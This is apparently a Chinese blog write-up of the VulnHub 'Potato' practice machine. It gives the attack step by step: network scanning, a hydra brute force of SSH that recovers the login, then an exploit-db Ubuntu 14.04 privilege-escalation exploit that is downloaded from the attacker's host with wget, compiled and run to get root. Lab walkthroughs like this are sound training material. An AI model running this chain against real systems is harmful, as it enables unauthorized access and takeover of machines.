当前位置: 首页 > article >正文

vulnhub potato靶机

搭建靶机

扫描靶机IP

arp-scan -l

靶机IP:192.168.47.139

信息收集

nmap -A -p- 192.168.47.139

dirb http://192.168.47.139/

一个土豆子一个phpinfo

ssh开在7120端口

漏洞探测

打开什么都是土豆;用户名就用potato;利用九头蛇爆破一下密码

爆破出来了

hydra -l potato -P /home/zss/Desktop/zi.txt  -vV -t 16 ssh://192.168.47.139:7120

账号:potato
密码:letmein

连接试试

ssh potato@192.168.47.139 -p 7120

Ok成功登录

查询一下ubuntu的版本;然后去kali查询一下他的漏洞

版本是:ubuntu 14.04

利用searchploit 查看一下版本漏洞

searchploit ubuntu 14.04

漏洞利用

将这个目录复制到当前

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

kali开启对外服务

python3 -m http.server 80

靶机下载一下来

wget http://192.168.47.130/37292.c

将37292.c 编译为可执行文件

gcc 37292.c -o exp

执行exp就可以获取root权限

获取flag


http://www.kler.cn/a/470621.html

相关文章:

  • 【HarmonyOS NEXT】鸿蒙应用使用后台任务之长时任务,解决屏幕录制音乐播放等操作不被挂起
  • LabVIEW之树形控件
  • GOAT‘S AI早鸟报Part9
  • STM32U575按键转换及设备驱动
  • http源码分析
  • 运动相机拍摄的视频打不开怎么办
  • HackMyVM-Again靶机的测试报告
  • 【智能算法】改进蚁狮优化算法【matlab】
  • arkTs数据存储
  • Visual Studio 2022 C++ gRPC 环境搭建
  • 六十三:七层负载均衡做了些什么?
  • HTML——79.代码快捷输入方式
  • grouped.get_group((‘B‘, ‘A‘))选择分组
  • TensorFlow深度学习实战(4)——正则化技术详解
  • Golang,Let‘s GO!
  • 下载excel
  • Linux安装ubuntu
  • Tomcat解析
  • 40% 降本:多点 DMALL x StarRocks 的湖仓升级实战
  • 深入理解 Linux 管道:创建与应用详解(匿名管道进程池)
  • 学习随记:word2vec的distance程序源码注释、输入输出文件格式说明
  • Spark服装数据分析系统 大屏数据展示 智能服装推荐系统(协同过滤余弦函数)
  • 【three.js】模型-几何体Geometry,材质Material
  • redis的学习(三)
  • 保障移动应用安全:多层次安全策略应对新兴威胁
  • Unity-Mirror网络框架从入门到精通之Attributes属性介绍